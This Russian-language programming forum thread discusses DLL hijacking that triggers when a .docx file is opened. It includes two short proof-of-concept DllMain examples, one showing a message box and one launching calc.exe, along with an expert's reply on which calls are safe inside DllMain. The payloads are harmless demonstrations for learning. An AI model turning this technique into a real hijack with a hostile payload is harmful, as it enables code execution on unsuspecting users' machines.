Форум программистов, компьютерный форум, киберфорум
C/C++
Войти
Регистрация
Восстановить пароль
Блоги Сообщество Поиск Заказать работу  
 
Рейтинг 4.92/13: Рейтинг темы: голосов - 13, средняя оценка - 4.92
1 / 1 / 0
Регистрация: 31.07.2014
Сообщений: 55

DLL hijacking или подмена DLL при открытии .docx

07.12.2015, 21:33. Показов 2595. Ответов 4
Метки нет (Все метки)

Студворк — интернет-сервис помощи студентам
Набрел как-то на статью на хабре. Решил проверить на своем компе. Создал DLL следующего содержания:
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <windows.h>
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
            MessageBoxA(NULL, "Hi from DLL", "Info", MB_OK);
            break;
 
        case DLL_PROCESS_DETACH:
            // detach from process
            break;
 
        case DLL_THREAD_ATTACH:
            // attach to thread
            break;
 
        case DLL_THREAD_DETACH:
            // detach from thread
            break;
    }
    return TRUE; // succesful
}
Все просто. Попробовал проэксплуатировать - ничего. Скачал библиотеки Parvez'a Anwar'a с ссылки с поста, переименовал его dll - все заработало. Собственно код его dll:
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <stdio.h>
#include <windows.h>
 
#pragma comment(lib,"shell32.lib")
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
   if (fdwReason==DLL_PROCESS_ATTACH)
   {
      ShellExecute(NULL, "open", "c:\\windows\\system32\\calc.exe",  NULL, NULL, SW_SHOWNORMAL);
   }
   else 
    return TRUE;
 
   return FALSE;
}
Прошу прокомментировать, может где ошибка у меня?
Еще очень странно, что его dll занимает 52 Кб в отличии от моей Debug версии в 25 Кб. Также пробовал с двумя версиями: и Debug, и Release
Прошу помочь) Уж очень интересно как это все работает
Заранее спасибо
0
Лучшие ответы (1)
IT_Exp
Эксперт
34794 / 4073 / 2104
Регистрация: 17.06.2006
Сообщений: 32,602
Блог
07.12.2015, 21:33
Ответы с готовыми решениями:

Ошибка об отсутствии MSVCP140D.dll, ucrtbased.dll, CONCRT140D.dll, VCRUNTIME140D.dll
Добрый день, товарищи. Возникла проблема. Делаю программу с использованием openCV 3.1 на Visual Studio 2013. При компиляции выдает ошибку...

Проблемы с dll при открытии с сервера
Была написанна мною dll. После я ее зарегистрировал на клиентской машине и на сервере. Когда доступ осуществляется с клиентской машины dll...

Тормоз при открытии русских файлов ч/з DLL
День добрый всем! Создал вот такую ActiveX.dll Public Function Opening_File(tPath As String, tFile As String) As String Dim...

4
Ушел с форума
Эксперт С++
 Аватар для Убежденный
16481 / 7444 / 1187
Регистрация: 02.05.2013
Сообщений: 11,616
Записей в блоге: 1
08.12.2015, 09:50
Из DllMain можно вызывать только функции ntdll и некоторое подмножество kernel32/kernelbase.
Так что оба примера - г-нкод и работают лишь чудом.
0
1 / 1 / 0
Регистрация: 31.07.2014
Сообщений: 55
08.12.2015, 12:15  [ТС]
А где можно побольше найти информации и по этому вопросу? В плане о dll в целом и ntdll?
0
Ушел с форума
Эксперт С++
 Аватар для Убежденный
16481 / 7444 / 1187
Регистрация: 02.05.2013
Сообщений: 11,616
Записей в блоге: 1
08.12.2015, 12:42
Лучший ответ Сообщение было отмечено Alex_The_King как решение

Решение

На MSDN есть достаточно полезных материалов по теме.
Ключевые слова - "creating dll", "dll best practices", "dllmain" и т.п.

А ntdll - это недокументированно, официальной информации очень мало.
1
1 / 1 / 0
Регистрация: 31.07.2014
Сообщений: 55
08.12.2015, 12:59  [ТС]
Спасибо большое, будем разбираться
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
BasicMan
Эксперт
29316 / 5623 / 2384
Регистрация: 17.02.2009
Сообщений: 30,364
Блог
08.12.2015, 12:59
Помогаю со студенческими работами здесь

При открытии-установке программы выдает SISyDbRelease.dll
Скачал прогу - каталог что то типа база данных по запчастям 7 гб несколько дней комп не выключал . При открытии ixi файла выдает...

Как множество dll собрать в один dll или exe файл?
Сделал тестовый проектик по работе с БД (Entity Framework), скомпилировал и как глянул в папку Debug....., а там куча dll файлов. Путем...

Как узнать какие dll Загружает процесс или dll
Проблема вот в чем: Нужно определить какие dll загружает процесс. Есть ли такая функция WinAPI?

Отсутствует gbs32.dll, fbclient.dll или путь к ним
Я не смогла зарегистрировать базу, так как мэнеджер запросил указать путь к gbs32.dll или fbclient.dll. Файлы скачала и установила, но...

normaliz.dll(или normalize.dll) не найден
С рабочего стола пропали все значки, а когда пытаюсь открыть их через диспетчер, выдает ошибку:&quot;...не может запуститься, т.к....


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
5
Ответ Создать тему
Новые блоги и статьи
PhpStorm 2025.3: WSL Terminal всегда стартует в ~
and_y87 14.12.2025
PhpStorm 2025. 3: WSL Terminal всегда стартует в ~ (home), игнорируя директорию проекта Симптом: После обновления до PhpStorm 2025. 3 встроенный терминал WSL открывается в домашней директории. . .
Access
VikBal 11.12.2025
Помогите пожалуйста !! Как объединить 2 одинаковые БД Access с разными данными.
Новый ноутбук
volvo 07.12.2025
Всем привет. По скидке в "черную пятницу" взял себе новый ноутбук Lenovo ThinkBook 16 G7 на Амазоне: Ryzen 5 7533HS 64 Gb DDR5 1Tb NVMe 16" Full HD Display Win11 Pro
Музыка, написанная Искусственным Интеллектом
volvo 04.12.2025
Всем привет. Некоторое время назад меня заинтересовало, что уже умеет ИИ в плане написания музыки для песен, и, собственно, исполнения этих самых песен. Стихов у нас много, уже вышли 4 книги, еще 3. . .
От async/await к виртуальным потокам в Python
IndentationError 23.11.2025
Армин Ронахер поставил под сомнение async/ await. Создатель Flask заявляет: цветные функции - провал, виртуальные потоки - решение. Не threading-динозавры, а новое поколение лёгких потоков. Откат?. . .
Поиск "дружественных имён" СОМ портов
Argus19 22.11.2025
Поиск "дружественных имён" СОМ портов На странице: https:/ / norseev. ru/ 2018/ 01/ 04/ comportlist_windows/ нашёл схожую тему. Там приведён код на С++, который показывает только имена СОМ портов, типа,. . .
Сколько Государство потратило денег на меня, обеспечивая инсулином.
Programma_Boinc 20.11.2025
Сколько Государство потратило денег на меня, обеспечивая инсулином. Вот решила сделать интересный приблизительный подсчет, сколько государство потратило на меня денег на покупку инсулинов. . . .
Ломающие изменения в C#.NStar Alpha
Etyuhibosecyu 20.11.2025
Уже можно не только тестировать, но и пользоваться C#. NStar - писать оконные приложения, содержащие надписи, кнопки, текстовые поля и даже изображения, например, моя игра "Три в ряд" написана на этом. . .
Мысли в слух
kumehtar 18.11.2025
Кстати, совсем недавно имел разговор на тему медитаций с людьми. И обнаружил, что они вообще не понимают что такое медитация и зачем она нужна. Самые базовые вещи. Для них это - когда просто люди. . .
Создание Single Page Application на фреймах
krapotkin 16.11.2025
Статья исключительно для начинающих. Подходы оригинальностью не блещут. В век Веб все очень привыкли к дизайну Single-Page-Application . Быстренько разберем подход "на фреймах". Мы делаем одну. . .
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2025, CyberForum.ru